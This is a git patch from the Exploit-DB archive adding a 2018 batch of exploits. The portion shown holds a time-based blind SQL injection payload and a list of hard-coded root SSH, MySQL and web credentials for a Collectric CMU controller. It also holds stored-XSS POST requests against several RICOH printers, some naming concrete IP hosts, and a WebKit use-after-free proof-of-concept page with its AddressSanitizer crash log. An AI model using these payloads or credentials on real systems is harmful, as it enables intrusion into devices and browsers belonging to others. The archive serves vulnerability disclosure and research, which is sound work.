From 4e39fa0f913894d3ec22e14e64e1fd4fe5f31238 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Wed, 26 Sep 2018 05:02:43 +0000
Subject: [PATCH] DB: 2018-09-26

35 changes to exploits/shellcodes

WebKit - 'WebCore::SVGAnimateElementBase::resetAnimatedType' Use-After-Free
WebKit - 'WebCore::AXObjectCache::handleMenuItemSelected' Use-After-Free
WebKit - 'WebCore::Node::ensureRareData' Use-After-Free
WebKit - 'WebCore::InlineTextBox::paint' Out-of-Bounds Read
WebKit - 'WebCore::RenderMultiColumnSet::updateMinimumColumnHeight' Use-After-Free
WebKit - 'WebCore::SVGTRefElement::updateReferencedText' Use-After-Free
WebKit - 'WebCore::RenderLayer::updateDescendantDependentFlags' Use-After-Free
WebKit - 'WebCore::SVGTextLayoutAttributes::context' Use-After-Free
WebKit - 'WebCore::RenderTreeBuilder::removeAnonymousWrappersForInlineChildrenIfNeeded' Use-After-Free
Easy PhoroResQ 1.0 - Buffer Overflow
Solaris - 'EXTREMEPARR' dtappgather Privilege Escalation (Metasploit)
Faleemi Desktop Software 1.8.2 - 'Device alias' Local Buffer Overflow (SEH)

Collectric CMU 1.0 - 'lang' SQL injection
Collectric CMU 1.0 - 'lang' Hard-Coded Credentials / SQL injection
RICOH MP C2003 Printer - Cross-Site Scripting
Joomla! Component Dutch Auction Factory 2.0.2 - 'filter_order_Dir' SQL Injection
Super Cms Blog Pro 1.0 - SQL Injection
Joomla! Component Raffle Factory 3.5.2 - SQL Injection
Joomla! Component Music Collection 3.0.3 - SQL Injection
Joomla! Component Penny Auction Factory 2.0.4 - SQL Injection
Joomla! Component Questions 1.4.3 - SQL Injection
Joomla! Component Jobs Factory 2.0.4 - SQL Injection
Joomla! Component Social Factory 3.8.3 - SQL Injection
RICOH MP C6503 Plus Printer - Cross-Site Scripting
Joomla Component eXtroForms 2.1.5 - 'filter_type_id' SQL Injection
Joomla! Component Swap Factory 2.2.1 - SQL Injection
Joomla! Component Collection Factory 4.1.9 - SQL Injection
Joomla! Component Reverse Auction Factory 4.3.8 - SQL Injection
Joomla! Component AlphaIndex Dictionaries 1.0 - SQL Injection
Joomla! Component Article Factory Manager 4.3.9 - SQL Injection
Joomla! Component Timetable Schedule 3.6.8 - SQL Injection
RICOH MP 305+ Printer - Cross-Site Scripting
RICOH MP C406Z Printer - Cross-Site Scripting
Joomla! Component Responsive Portfolio 1.6.1 - 'filter_order_Dir' SQL Injection

Linux/ARM - sigaction() Based Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (52 Bytes)
Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) + sigaction() Shellcode (52 Bytes)
---
 exploits/hardware/webapps/45446.txt |  32 +++-
 exploits/hardware/webapps/45461.txt |  31 ++++
 exploits/hardware/webapps/45471.txt |  30 ++++
 exploits/hardware/webapps/45487.txt |  30 ++++
 exploits/hardware/webapps/45490.txt |  31 ++++
 exploits/multiple/dos/45480.html    | 166 +++++++++++++++++
 exploits/multiple/dos/45481.html    | 189 +++++++++++++++++++
 exploits/multiple/dos/45482.html    | 269 ++++++++++++++++++++++++++++
 exploits/multiple/dos/45483.html    | 179 ++++++++++++++++++
 exploits/multiple/dos/45484.html    | 224 +++++++++++++++++++++++
 exploits/multiple/dos/45485.html    | 214 ++++++++++++++++++++++
 exploits/multiple/dos/45486.html    | 178 ++++++++++++++++++
 exploits/multiple/dos/45488.html    | 204 +++++++++++++++++++++
 exploits/multiple/dos/45489.html    | 214 ++++++++++++++++++++++
 exploits/php/webapps/45438.txt      |   2 +-
 exploits/php/webapps/45439.txt      |   2 +-
 exploits/php/webapps/45462.txt      |  15 ++
 exploits/php/webapps/45463.txt      |  21 +++
 exploits/php/webapps/45464.txt      |  21 +++
 exploits/php/webapps/45465.txt      |  21 +++
 exploits/php/webapps/45466.txt      |  21 +++
 exploits/php/webapps/45468.txt      |  36 ++++
 exploits/php/webapps/45469.txt      |  23 +++
 exploits/php/webapps/45470.txt      |  21 +++
 exploits/php/webapps/45472.txt      |  77 ++++++++
 exploits/php/webapps/45473.txt      |  21 +++
 exploits/php/webapps/45474.txt      |  21 +++
 exploits/php/webapps/45475.txt      |  31 ++++
 exploits/php/webapps/45476.txt      |  45 +++++
 exploits/php/webapps/45477.txt      |  21 +++
 exploits/php/webapps/45478.txt      |  20 +++
 exploits/php/webapps/45491.txt      |  98 ++++++++++
 exploits/solaris/local/45479.rb     | 238 ++++++++++++++++++++++++
 exploits/windows_x86/local/45467.py |  27 +++
 exploits/windows_x86/local/45492.py |  51 ++++++
 files_exploits.csv                  |  34 +++-
 files_shellcodes.csv                |   2 +-
 37 files changed, 2855 insertions(+), 5 deletions(-)
 create mode 100644 exploits/hardware/webapps/45461.txt
 create mode 100644 exploits/hardware/webapps/45471.txt
 create mode 100644 exploits/hardware/webapps/45487.txt
 create mode 100644 exploits/hardware/webapps/45490.txt
 create mode 100644 exploits/multiple/dos/45480.html
 create mode 100644 exploits/multiple/dos/45481.html
 create mode 100644 exploits/multiple/dos/45482.html
 create mode 100644 exploits/multiple/dos/45483.html
 create mode 100644 exploits/multiple/dos/45484.html
 create mode 100644 exploits/multiple/dos/45485.html
 create mode 100644 exploits/multiple/dos/45486.html
 create mode 100644 exploits/multiple/dos/45488.html
 create mode 100644 exploits/multiple/dos/45489.html
 create mode 100644 exploits/php/webapps/45462.txt
 create mode 100644 exploits/php/webapps/45463.txt
 create mode 100644 exploits/php/webapps/45464.txt
 create mode 100644 exploits/php/webapps/45465.txt
 create mode 100644 exploits/php/webapps/45466.txt
 create mode 100644 exploits/php/webapps/45468.txt
 create mode 100644 exploits/php/webapps/45469.txt
 create mode 100644 exploits/php/webapps/45470.txt
 create mode 100644 exploits/php/webapps/45472.txt
 create mode 100644 exploits/php/webapps/45473.txt
 create mode 100644 exploits/php/webapps/45474.txt
 create mode 100644 exploits/php/webapps/45475.txt
 create mode 100644 exploits/php/webapps/45476.txt
 create mode 100644 exploits/php/webapps/45477.txt
 create mode 100644 exploits/php/webapps/45478.txt
 create mode 100644 exploits/php/webapps/45491.txt
 create mode 100755 exploits/solaris/local/45479.rb
 create mode 100755 exploits/windows_x86/local/45467.py
 create mode 100755 exploits/windows_x86/local/45492.py

diff --git a/exploits/hardware/webapps/45446.txt b/exploits/hardware/webapps/45446.txt
index 7528a8932..715d20dea 100644
--- a/exploits/hardware/webapps/45446.txt
+++ b/exploits/hardware/webapps/45446.txt
@@ -20,4 +20,34 @@ Payload: username=yUqg&lang=SWEDISH' AND 1320=1320 AND 'EXAr'='EXAr&password=zhd
 # Type: AND/OR time-based blind
 # Title: MySQL >= 5.0.12 AND time-based blind
 
-Payload: username=yUqg&lang=SWEDISH' AND SLEEP(5) AND 'kglV'='kglV&password=zhdY&setcookie=setcookie&submit=Logga in
\ No newline at end of file
+Payload: username=yUqg&lang=SWEDISH' AND SLEEP(5) AND 'kglV'='kglV&password=zhdY&setcookie=setcookie&submit=Logga in
+
+
+# Exploit Title: Collectric CMU - Hard-coded SSH/MySQL/Web credentials.
+# Discoverer: Simon Brannstrom
+# Date: 09/15/2018
+# Vendor Homepage: http://ourenergy.se/
+# Software Link: n/a
+# Version: All known versions
+# Tested on: Linux
+# About: Collectric CMU is a Swedish made controller device for electrical devices such as car heaters, camping sites etc, powered by a NGW board running Linux 2.6.30 with a PHP admin interface.
+More vulnerabilities exists, see my other vulnerability reports.
+
+---
+Web Portal hard-coded credentials:
+username: sysadmin
+password: zoogin
+
+SSH user/root credentials:
+username: kplc
+password: kplc
+
+username: root
+password: zoogin
+
+*The SSH server is running Dropbear sshd 0.52 (protocol 2.0) which requires diffie-hellman-group1-sha1.
+
+MySQL root credentials:
+username: root
+password: sql4u
+---
\ No newline at end of file
diff --git a/exploits/hardware/webapps/45461.txt b/exploits/hardware/webapps/45461.txt
new file mode 100644
index 000000000..c623f904b
--- /dev/null
+++ b/exploits/hardware/webapps/45461.txt
@@ -0,0 +1,31 @@
+# Exploit Title: RICOH MP C2003 Printer - Cross-Site Scripting
+# Date: 2018-09-21 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.ricoh.com/
+# Hardware Link : https://www.ricoh.ca/en/products/pd/mp-c2003-color-laser-multifunction-printer/_/R-240-417253
+# Software : RICOH Printer
+# Product Version:  MP C2003
+# Vulernability Type : Code Injection
+# Vulenrability : HTML Injection and Stored XSS
+# CVE : N/A
+
+# On the MP C2003 printer, HTML Injection and Stored XSS vulnerabilities have been discovered in 
+# the area of adding addresses via the entryNameIn parameter 
+# to /web/entry/en/address/adrsSetUserWizard.cgi.
+
+# HTTP POST Request :
+
+POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
+Host: 134.96.209.202
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
+Accept: text/plain, */*
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://134.96.209.202/web/entry/en/address/adrsList.cgi
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 193
+Cookie: risessionid=028553667951828; cookieOnOffChecker=on; wimsesid=552487526
+Connection: close
+
+mode=ADDUSER&step=BASE&wimToken=1581082599&entryIndexIn=00005&entryNameIn=%22%3E%3Ch1%3EIsmail%3C%2Fh1%3E&entryDisplayNameIn=&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1
\ No newline at end of file
diff --git a/exploits/hardware/webapps/45471.txt b/exploits/hardware/webapps/45471.txt
new file mode 100644
index 000000000..e425bc6cb
--- /dev/null
+++ b/exploits/hardware/webapps/45471.txt
@@ -0,0 +1,30 @@
+# Exploit Title: RICOH MP C6503 Plus Printer - Cross-Site Scripting
+# Date: 2018-09-21 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.ricoh.com/
+# Hardware Link: https://www.ricoh-usa.com/en/products/pd/equipment/printers-and-copiers/multifunction-printers-copiers/mp-c6503-plus-color-laser-multifunction-printer/_/R-SIG-C6503-PLU-SET
+# Software: RICOH Printer
+# Product Version:  MP C6503 Plus
+# Vulernability Type: Code Injection
+# Vulenrability: HTML Injection and Stored XSS
+# CVE: N/A
+
+# On the RICOH MP C6503 Plus printer, HTML Injection and Stored XSS vulnerabilities have been discovered 
+# in the area of adding addresses via the entryNameIn parameter to /web/entry/en/address/adrsSetUserWizard.cgi.
+
+# HTTP POST Request :
+
+POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
+Host: Target
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
+Accept: text/plain, */*
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://Target/web/entry/en/address/adrsList.cgi
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 192
+Cookie: risessionid=186737374338492; cookieOnOffChecker=on; wimsesid=205216910
+Connection: close
+
+mode=ADDUSER&step=BASE&wimToken=278155990&entryIndexIn=00018&entryNameIn=%22%3E%3Ch1%3EIsmail%3C%2Fh1%3E&entryDisplayNameIn=&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1
\ No newline at end of file
diff --git a/exploits/hardware/webapps/45487.txt b/exploits/hardware/webapps/45487.txt
new file mode 100644
index 000000000..64a0c9366
--- /dev/null
+++ b/exploits/hardware/webapps/45487.txt
@@ -0,0 +1,30 @@
+# Exploit Title: RICOH MP 305+ Printer - Cross-Site Scripting
+# Date: 2018-09-21 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.ricoh.com/
+# Hardware Link: https://www.ricoh-europe.com/products/office-printers-fax/all-in-one-printers/mp-305sp.html
+# Software: RICOH Printer
+# Product Version:  MP 305+
+# Vulernability Type: Code Injection
+# Vulenrability: HTML Injection and Stored XSS
+# CVE:
+
+# On the RICOH Aficio MP 305+ printer, HTML Injection and Stored XSS vulnerabilities have been discovered 
+# in the area of adding addresses via the entryNameIn parameter to /web/entry/en/address/adrsSetUserWizard.cgi.
+
+# HTTP POST Request :
+
+POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
+Host: Target
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
+Accept: text/plain, */*
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://Target/web/entry/en/address/adrsList.cgi
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 193
+Cookie: risessionid=125043496912702; cookieOnOffChecker=on; wimsesid=182442825
+Connection: close
+
+mode=ADDUSER&step=BASE&wimToken=2128826648&entryIndexIn=00002&entryNameIn=%22%3E%3Ch1%3EIsmail%3C%2Fh1%3E&entryDisplayNameIn=&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1
\ No newline at end of file
diff --git a/exploits/hardware/webapps/45490.txt b/exploits/hardware/webapps/45490.txt
new file mode 100644
index 000000000..c1b8915f5
--- /dev/null
+++ b/exploits/hardware/webapps/45490.txt
@@ -0,0 +1,31 @@
+# Exploit Title: RICOH MP C406Z Printer - Cross-Site Scripting
+# Date: 2018-09-21 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.ricoh.com/
+# Hardware Link: https://www.ricoh-usa.com/en/products/pd/equipment/printers-and-copiers/multifunction-printers-copiers/mp-c406-color-laser-multifunction-printer/_/R-417322
+# Software: RICOH Printer
+# Product Version:  MP C406Z
+# Vulernability Type: Code Injection
+# Vulenrability: HTML Injection and Stored XSS
+# CVE: N/A
+
+# On the RICOH MP C406Z printer, HTML Injection and Stored XSS vulnerabilities have been discovered 
+# in the area of adding addresses via the entryNameIn parameter 
+# to /web/entry/en/address/adrsSetUserWizard.cgi.
+
+# HTTP POST Request :
+
+POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
+Host: 129.24.200.133
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
+Accept: text/plain, */*
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://129.24.200.133/web/entry/en/address/adrsList.cgi
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 193
+Cookie: risessionid=025838330540046; cookieOnOffChecker=on; wimsesid=655124944
+Connection: close
+
+mode=ADDUSER&step=BASE&wimToken=2029349348&entryIndexIn=00001&entryNameIn=%22%3E%3Ch1%3EIsmail%3C%2Fh1%3E&entryDisplayNameIn=&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1
\ No newline at end of file
diff --git a/exploits/multiple/dos/45480.html b/exploits/multiple/dos/45480.html
new file mode 100644
index 000000000..e50c9e05c
--- /dev/null
+++ b/exploits/multiple/dos/45480.html
@@ -0,0 +1,166 @@
+<!--
+There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on the ASan build of the latest WebKit source on OSX.
+
+PoC:
+
+=================================================================
+-->
+
+<script>
+function eventhandler2() {
+try { var var00138 = svgvar00013.parentNode; } catch(e) { }
+try { htmlvar00006.setAttribute("onfocusin", "eventhandler2()"); } catch(e) { }
+try { svgvar00001.after(var00138); } catch(e) { }
+}
+function eventhandler5() {
+try { htmlvar00028.autofocus = true; } catch(e) { }
+try { htmlvar00034.appendChild(htmlvar00006); } catch(e) { }
+}
+</script>
+<h5 id="htmlvar00006">
+<keygen id="htmlvar00028">
+</h5>
+<a id="htmlvar00034">
+<svg id="svgvar00001">
+<g onload="eventhandler2()"></g>
+<animate attributeName="fill" />
+<polygon id="svgvar00013" />
+<br>
+<details ontoggle="eventhandler5()" open="true"></details>
+
+<!--
+=================================================================
+
+ASan log:
+
+=================================================================
+==25305==ERROR: AddressSanitizer: heap-use-after-free on address 0x60300014ff80 at pc 0x00052bbd87c6 bp 0x7ffee9af05b0 sp 0x7ffee9af05a8
+READ of size 8 at 0x60300014ff80 thread T0
+==25305==WARNING: invalid path to external symbolizer!
+==25305==WARNING: Failed to use and restart external symbolizer!
+    #0 0x52bbd87c5 in WebCore::SVGAnimateElementBase::resetAnimatedType() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3bd87c5)
+    #1 0x52bdc5c22 in WebCore::SVGSMILElement::progress(WebCore::SMILTime, WebCore::SVGSMILElement*, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3dc5c22)
+    #2 0x52bdc2fae in WebCore::SMILTimeContainer::updateAnimations(WebCore::SMILTime, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3dc2fae)
+    #3 0x52bdc16ec in WebCore::SMILTimeContainer::timerFired() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3dc16ec)
+    #4 0x52b134d02 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3134d02)
+    #5 0x52b1e5cf9 in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x31e5cf9)
+    #6 0x7fff54e0e063 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8f063)
+    #7 0x7fff54e0dcd6 in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8ecd6)
+    #8 0x7fff54e0d7d9 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8e7d9)
+    #9 0x7fff54e04daa in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x85daa)
+    #10 0x7fff54e041a2 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x851a2)
+    #11 0x7fff540ead95 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fd95)
+    #12 0x7fff540eab05 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fb05)
+    #13 0x7fff540ea883 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2f883)
+    #14 0x7fff5239ca72 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x41a72)
+    #15 0x7fff52b32e33 in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7d7e33)
+    #16 0x7fff52391884 in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x36884)
+    #17 0x7fff52360a71 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5a71)
+    #18 0x7fff7cf6cdc6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x10dc6)
+    #19 0x7fff7cf6ba19 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xfa19)
+    #20 0x10610d4d6 in main (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x1000014d6)
+    #21 0x7fff7cc12014 in start (/usr/lib/system/libdyld.dylib:x86_64+0x1014)
+
+0x60300014ff80 is located 0 bytes inside of 32-byte region [0x60300014ff80,0x60300014ffa0)
+freed by thread T0 here:
+    #0 0x10a249fa4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59fa4)
+    #1 0x537a50c12 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xeec12)
+    #2 0x52bbd9c62 in WebCore::SVGAnimateElementBase::resetAnimatedPropertyType() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3bd9c62)
+    #3 0x52bc4a365 in WebCore::SVGDocumentExtensions::clearTargetDependencies(WebCore::SVGElement&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3c4a365)
+    #4 0x52bc4bcce in WebCore::SVGElement::removedFromAncestor(WebCore::Node::RemovalType, WebCore::ContainerNode&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3c4bcce)
+    #5 0x52a3ff8a2 in WebCore::notifyNodeRemovedFromDocument(WebCore::ContainerNode&, WebCore::TreeScopeChange, WebCore::Node&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23ff8a2)
+    #6 0x52a3ff737 in WebCore::notifyChildNodeRemoved(WebCore::ContainerNode&, WebCore::Node&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23ff737)
+    #7 0x52a3f868c in WebCore::ContainerNode::removeChild(WebCore::Node&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23f868c)
+    #8 0x52a3f67c2 in WebCore::collectChildrenAndRemoveFromOldParent(WebCore::Node&, WTF::Vector<WTF::Ref<WebCore::Node, WTF::DumbPtrTraits<WebCore::Node> >, 11ul, WTF::CrashOnOverflow, 16ul>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23f67c2)
+    #9 0x52a3f56ef in WebCore::ContainerNode::insertBefore(WebCore::Node&, WebCore::Node*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23f56ef)
+    #10 0x52a58b557 in WebCore::Node::after(WTF::Vector<WTF::Variant<WTF::RefPtr<WebCore::Node, WTF::DumbPtrTraits<WebCore::Node> >, WTF::String>, 0ul, WTF::CrashOnOverflow, 16ul>&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x258b557)
+    #11 0x5288bb99a in WebCore::jsElementPrototypeFunctionAfterBody(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8bb99a)
+    #12 0x52889d3e7 in long long WebCore::IDLOperation<WebCore::JSElement>::call<&(WebCore::jsElementPrototypeFunctionAfterBody(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x89d3e7)
+    #13 0x56962e86176  (<unknown module>)
+    #14 0x537a7434d in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11234d)
+    #15 0x537a743a8 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1123a8)
+    #16 0x537a6d9da in vmEntryToJavaScript (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x10b9da)
+    #17 0x5397d8344 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1e76344)
+    #18 0x539da9169 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x2447169)
+    #19 0x539da92fb in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x24472fb)
+    #20 0x539da96a1 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x24476a1)
+    #21 0x529ea73f8 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1ea73f8)
+    #22 0x529ef58cc in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1ef58cc)
+    #23 0x52a534bfe in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener, WTF::DumbPtrTraits<WebCore::RegisteredEventListener> >, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2534bfe)
+    #24 0x52a5301ce in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25301ce)
+    #25 0x52a5137a0 in WebCore::EventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25137a0)
+    #26 0x52a527924 in WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2527924)
+    #27 0x52a52726e in WebCore::EventDispatcher::dispatchEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x252726e)
+    #28 0x52a526cfd in WebCore::EventDispatcher::dispatchScopedEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2526cfd)
+    #29 0x52a505ec6 in WebCore::Element::dispatchFocusInEvent(WTF::AtomicString const&, WTF::RefPtr<WebCore::Element, WTF::DumbPtrTraits<WebCore::Element> >&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2505ec6)
+
+previously allocated by thread T0 here:
+    #0 0x10a249a3c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59a3c)
+    #1 0x7fff7cdbb1bc in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x21bc)
+    #2 0x537a51124 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xef124)
+    #3 0x537a4d82d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xeb82d)
+    #4 0x5379acdcb in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x4adcb)
+    #5 0x5379ac11a in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x4a11a)
